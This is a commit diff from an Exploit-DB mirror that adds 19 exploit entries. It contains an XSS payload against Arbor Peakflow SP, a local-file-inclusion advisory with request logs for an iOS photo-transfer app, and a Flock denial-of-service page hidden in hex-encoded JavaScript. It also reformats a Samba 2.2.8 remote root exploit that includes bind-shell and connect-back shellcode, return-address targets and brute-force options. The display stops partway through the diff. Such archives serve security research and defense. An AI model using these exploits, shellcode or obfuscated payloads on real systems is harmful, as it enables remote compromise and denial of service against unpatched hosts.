bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-19

Browse source 
19 new exploits
This commit is contained in:
Offensive Security 2015-05-19 05:03:23 +00:00
parent 2be48e03b5
commit 6086516a4d
21 changed files with 1099 additions and 213 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -9,6 +9,7 @@ id,file,description,date,author,platform,type,port
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
37060,platforms/windows/dos/37060.html,"Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
@ -33419,3 +33420,21 @@ id,file,description,date,author,platform,type,port
37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0
37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service Vulnerability",2012-03-31,r45c4l,linux,dos,0
37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 'index/' Cross Site Scripting Vulnerability",2012-04-03,b.saleh,hardware,remote,0
37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37041,platforms/php/webapps/37041.txt,"osCMax 2.5 admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37042,platforms/php/webapps/37042.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37043,platforms/php/webapps/37043.txt,"osCMax 2.5 admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37044,platforms/php/webapps/37044.txt,"osCMax 2.5 admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37045,platforms/php/webapps/37045.txt,"osCMax 2.5 admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080
37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0

Can't render this file because it is too large.

7
platforms/hardware/remote/37037.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52881/info
Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/index/"onmouseover="alert(666)

216
platforms/ios/webapps/37057.txt Executable file
View file

@ -0,0 +1,216 @@
Document Title:
===============
Wireless Photo Transfer v3.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1492
Release Date:
=============
2015-05-12
Vulnerability Laboratory ID (VL-ID):
====================================
1492
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Transfer your photo without usb. The best wireless photo transfer app on the App Store.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application.
Vulnerability Disclosure Timeline:
==================================
2015-05-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Yan Xing
Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject
own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker
is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit
the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack
vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Submit (Upload)
Vulnerable Parameter(s):
[+] filename (album-title)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: #1 Index File Dir Listing (album-title)
<div class="album-folder">
<div class="album-number">2 items</div>
<div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a>
</a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140">
<img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a>
<div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div>
</div>
PoC: #2 Topic Album (Album Title - album_info_intro_driver)
<div class="top-section">
<div id="intro">
<div class="divider">
<h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a>
<div class="pagination"></div>
</a></div><a>
</a></div><a>
</a><div class="centered"><a>
</a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a>
<a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/upload.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/groups]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------8397114799830
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:80/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[210]
Connection[keep-alive]
Date[Sat, 09 May 2015 15:21:30 GMT]
Reference(s):
http://localhost:80/groups
http://localhost:80/upload.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync.
Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output
values in the mobile wifi interface (file dir) application.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

13
platforms/linux/dos/37036.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52856/info
Flock is prone to a denial-of-service vulnerability.
Successful exploits will consume excessive resources and will eventually crash the application and possibly the underlying computer, effectively denying service to legitimate users.
Flock 2.6.1 is vulnerable; other versions may also be affected.
<script type="text/javascript">
<!--
document.write(unescape('%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%4f%6f%70%73%20%75%72%20%62%72%6f%77%73%65%72%20%6a%75%73%74%20%64%69%65%64%20%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%66%75%6e%63%74%69%6f%6e%20%46%54%42%28%29%0d%0a%20%7b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%31%34%31%25%75%34%31%34%31%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%32%34%32%25%75%34%32%34%32%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%34%34%34%25%75%34%34%34%34%22%29%3b%0d%0a%20%20%20%20%66%6f%72%28%69%3d%30%3b%20%69%20%3c%3d%20%31%30%30%20%3b%20%2b%2b%69%29%0d%0a%20%7b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%20%6f%6e%4c%6f%61%64%3d%22%46%54%42%28%29%22%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e'));
//-->
</script>

318
platforms/linux/remote/10.c
View file

@ -92,8 +92,7 @@ pid_t childs[100];
struct sockaddr_in addr1; struct sockaddr_in addr1;
struct sockaddr_in addr2; struct sockaddr_in addr2;
char char linux_bindcode[] =
linux_bindcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
@ -108,8 +107,7 @@ linux_bindcode[] =
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
char char bsd_bindcode[] =
bsd_bindcode[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
@ -124,8 +122,7 @@ bsd_bindcode[] =
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a"; "\xeb\x9a";
char char linux_connect_back[] =
linux_connect_back[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
@ -136,8 +133,7 @@ linux_connect_back[] =
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"; "\x01\xcd\x80";
char char bsd_connect_back[] =
bsd_connect_back[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
@ -153,52 +149,30 @@ struct {
char *type; char *type;
unsigned long ret; unsigned long ret;
char *shellcode; char *shellcode;
int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */
stack */
} targets[] = { } targets[] = {
{ "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 },
{ "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 },
0 }, { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 },
0 }, { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 },
{ "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 },
0 }, { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 },
{ "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 },
0 }, { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 },
{ "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 },
0 }, { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 },
{ "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 },
0 },
{ "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode,
0 },
{ "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode,
1 },
{ "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode,
1 },
{ "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode,
1 },
{ "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode,
1 },
{ "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode,
2 },
{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,
2 },
{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,
2 },
{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,
2 },
{ "Crash (All platforms) ", 0xbade5dee, linux_bindcode,
0 },
}; };
void shell(); void shell();
@ -213,18 +187,14 @@ int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);
void void usage(char *prog)
usage(char *prog)
{ {
fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
"-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/Net "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
"-B <step> bruteforce steps (default = 300)\n" "-B <step> bruteforce steps (default = 300)\n"
"-c <ip address> connectback ip address\n" "-c <ip address> connectback ip address\n"
"-C <max childs> max childs for scan/bruteforce mode (d "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
efault = 40)\n" "-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)\n"
"-d <delay> bruteforce/scanmode delay in micro sec
onds (default = 100000)\n"
"-f force\n" "-f force\n"
"-p <port> port to attack (default = 139)\n" "-p <port> port to attack (default = 139)\n"
"-r <ret> return address\n" "-r <ret> return address\n"
@ -236,8 +206,7 @@ onds (default = 100000)\n"
exit(1); exit(1);
} }
int int is_samba(char *ip, unsigned long time_out)
is_samba(char *ip, unsigned long time_out)
{ {
char char
nbtname[]= /* netbios name packet */ nbtname[]= /* netbios name packet */
@ -290,10 +259,8 @@ is_samba(char *ip, unsigned long time_out)
ptr -= 19; ptr -= 19;
if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
& *(ptr + 3) == 0x00 && *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
*(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 &
& *(ptr + 6) == 0x00) {
close(s); close(s);
return 0; return 0;
} }
@ -310,8 +277,7 @@ is_samba(char *ip, unsigned long time_out)
return -1; return -1;
} }
int int Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -360,8 +326,7 @@ Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
} }
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
meout);
if(select_status == 0) { if(select_status == 0) {
close(fd); close(fd);
@ -379,8 +344,7 @@ meout);
{ {
getsockopt_length = sizeof(getsockopt_error); getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
or, &getsockopt_length) < 0) {
errno = ETIMEDOUT; errno = ETIMEDOUT;
close(fd); close(fd);
return -1; return -1;
@ -414,8 +378,7 @@ or, &getsockopt_length) < 0) {
return 1; return 1;
} }
int int read_timer(int fd, unsigned int time_out)
read_timer(int fd, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -468,8 +431,7 @@ read_timer(int fd, unsigned int time_out)
} }
} }
int int write_timer(int fd, unsigned int time_out)
write_timer(int fd, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -520,12 +482,10 @@ write_timer(int fd, unsigned int time_out)
} }
void void shell(int sock)
